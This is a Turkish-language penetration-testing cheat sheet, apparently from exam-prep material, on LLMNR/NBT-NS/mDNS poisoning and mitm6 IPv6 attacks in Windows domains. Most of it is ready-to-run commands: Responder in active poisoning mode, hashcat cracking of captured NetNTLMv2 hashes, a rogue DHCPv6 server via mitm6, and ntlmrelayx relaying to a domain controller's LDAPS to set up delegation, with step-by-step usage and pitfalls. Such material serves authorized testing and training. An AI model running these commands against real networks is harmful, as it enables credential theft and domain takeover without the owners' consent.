FOOTHOLD Metodoloji Cheat-sheet
Recon ✓ EXAM-SAFE orta :137:138:445:5355:5353:547

LLMNR / NBT-NS / mDNS Poisoning ve mitm6 — NetNTLMv2 Yakalama

Ad çözümleme yedek protokolleri (LLMNR/NBT-NS/mDNS) ve IPv6 DHCPv6/WPAD zehirlenmesiyle kurban makinelerden NetNTLMv2 hash yakalanır; hash ya offline kırılır ya da ntlmrelayx ile relay edilir. Credentialsiz bir ağ ayağı için klasik ilk adımdır.

Bilgi: ÖN KOŞULLAR
  • Hedef L2 broadcast/multicast domaininde (aynı VLAN) bir konum
  • Kurban makinelerin başarısız DNS sorguları (yanlış yazılan share, eski WPAD)
  • Relay senaryosu için hedefte SMB signing kapalı (NetNTLMv2 relay) ya da LDAP signing/channel binding zayıf
┌──

Komutlar

responder ✓ EXAM-SAFE
responder -I {{INTERFACE}} -wd
LLMNR/NBT-NS/mDNS dinleyicilerini + WPAD rogue proxy'yi (-w) ve answer-for-all (-d/Analyze yerine aktif) aç; yakalanan NetNTLMv2 hash'leri /usr/share/responder/logs altına yazılır. HackTricks — Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD; The Hacker Recipes — LLMNR/NBT-NS/mDNS spoofing
responder ✓ EXAM-SAFE
responder -I {{INTERFACE}} -A
Analyze (pasif) modu: hiçbir yanıt göndermeden ağdaki LLMNR/NBT-NS/MDNS sorgularını, browser broadcast'lerini ve gerçek WPAD trafiğini gözlemle. Müdahale öncesi 'gürültüyü görme' için exam-safe keşif. The Hacker Recipes — LLMNR/NBT-NS/mDNS spoofing (Analyze mode)
responder ✓ EXAM-SAFE
grep -ri 'NTLMv2' /usr/share/responder/logs/ ; ls -la /usr/share/responder/logs/
Yakalanan hash dosyalarını listele; her benzersiz kullanıcı için sadece İLK hash'i kullan (Responder aynı kullanıcıyı tekrar zehirlemez, dosyada çoğalsa da tek hash geçerlidir). HackTricks — Responder log location
hashcat ✓ EXAM-SAFE
hashcat -m 5600 hashes.txt {{WORDLIST}}
Yakalanan NetNTLMv2 hash'ini offline kır (mode 5600). Kullanıcı:domain:challenge:HMAC:blob formatının tamamını dosyaya koy. HackTricks — Cracking NetNTLMv2 (hashcat -m 5600)
mitm6 ✓ EXAM-SAFE
mitm6 -d {{DOMAIN}} -i {{INTERFACE}}
IPv6 saldırısı: rogue DHCPv6 ile kendini kurbanlara DNS sunucusu yap (Windows IPv6'yı IPv4'ten önce tercih eder). WPAD ve DNS sorguları sana gelir; genelde ntlmrelayx ile birlikte çalıştırılır. The Hacker Recipes — mitm6; Fox-IT mitm6 README
impacket-ntlmrelayx ✓ EXAM-SAFE
impacket-ntlmrelayx -6 -t ldaps://{{DC_IP}} -wh attacker-wpad --delegate-access
mitm6 ile birlikte: IPv6/WPAD üzerinden gelen makine kimliklerini DC LDAPS'e relay edip RBCD delegation kur. -wh WPAD host adı, -6 IPv6 dinler. The Hacker Recipes — mitm6 + ntlmrelayx (delegate-access)
nxc ✓ EXAM-SAFE
nxc smb {{RHOSTS}} --gen-relay-list relay_targets.txt
Relay için uygun (SMB signing KAPALI/zorunlu-değil) hedefleri tespit edip listele; bu liste ntlmrelayx -tf ile beslenir. NetExec Wiki — SMB --gen-relay-list

Neden Çalışır

Windows bir ismi (örn. \\fileserv01\share) DNS’te çözemezse sessizce yedek (fallback) protokollere düşer: LLMNR (UDP 5355), NBT-NS (UDP 137) ve mDNS (UDP 5353). Bu protokoller broadcast/multicast’tir ve kimlik doğrulaması yoktur — ağdaki herkes ‘o makine benim’ diye yanıt verebilir. Responder tam olarak bunu yapar: zehirli yanıtı gönderir, kurban sana bağlanır ve SMB/HTTP authentication sırasında NetNTLMv2 hash’ini sana teslim eder. Bu hash bir parola değildir; ya offline kırılır ya da relay edilir.

Adım Adım (Klasik LLMNR Yolu)

  1. Pasif keşif (exam-safe): Önce responder -I {{INTERFACE}} -A ile Analyze modunda dinle. Hiçbir paket enjekte etmeden hangi isimlerin sorulduğunu ve WPAD’in ağda aktif olup olmadığını gör. Sınav/yetki sınırlarında ‘önce gözlemle’ iyi pratiktir.
  2. Aktif zehirleme: responder -I {{INTERFACE}} -wd ile dinleyicileri ve rogue WPAD proxy’sini aç. Kurban yanlış bir isim sorduğunda ya da WPAD aradığında sana gelir.
  3. Hash toplama: Hash’ler /usr/share/responder/logs/ altına *-NTLMv2-SSP-*.txt olarak düşer. Önemli gotcha: Responder her benzersiz kullanıcının sadece ilk hash’ini geçerli kabul eder; aynı kullanıcı için sonraki kayıtlar genelde işe yaramaz.
  4. Kırma: hashcat -m 5600 ile NetNTLMv2’yi kır. NTLMv2 mode 5600’dir (NTLMv1 = 5500). Kırılan parola domain düz-metin credential’ı verir.

mitm6 (IPv6) Yolu

Modern Windows IPv6’yı IPv4’ten önce tercih eder ama çoğu ağda IPv6 DHCP yapılandırılmamıştır. mitm6 -d {{DOMAIN}} rogue bir DHCPv6 sunucusu olur, kurbanlara kendini DNS sunucusu olarak verir; sonra kurbanın WPAD ve diğer sorguları sana akar. Genelde tek başına değil, ntlmrelayx ile zincirlenir: gelen makine/kullanıcı kimliklerini DC’nin LDAPS’ine relay edip RBCD (--delegate-access) kurarsın. Gotcha: mitm6 agresiftir, lab/yetki dışında sessiz değildir; ayrıca relay tarafında LDAP signing/channel binding zayıf olmalıdır.

Relay’e Köprü

Hash’i kırmak yerine relay etmek çoğu zaman daha hızlıdır (parola hiç kırılmaz). Önce nxc smb {{RHOSTS}} --gen-relay-list relay_targets.txt ile SMB signing zorunlu OLMAYAN hedefleri çıkar; bu liste relay zincirinin girdisidir. Coercion + relay’in tam detayı ad-coerce-relay sayfasındadır.

Sık Hatalar

  • Yanlış arayüz: {{INTERFACE}} mutlaka kurbanlarla aynı L2 segmentinde olmalı; routed/farklı VLAN’da broadcast ulaşmaz.
  • Responder ve ntlmrelayx aynı anda SMB/HTTP portlarını dinleyemez — relay yaparken Responder’ın Responder.conf içinde SMB/HTTP’yi Off yapman gerekir.
  • Yakaladığın hash NTLMv1 ise mode 5500; v2 ile karıştırma.
┌──

Kaynaklar

↗ HackTricks — Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD↗ The Hacker Recipes — LLMNR/NBT-NS/mDNS spoofing↗ The Hacker Recipes — mitm6 (DHCPv6 spoofing)
0/15 set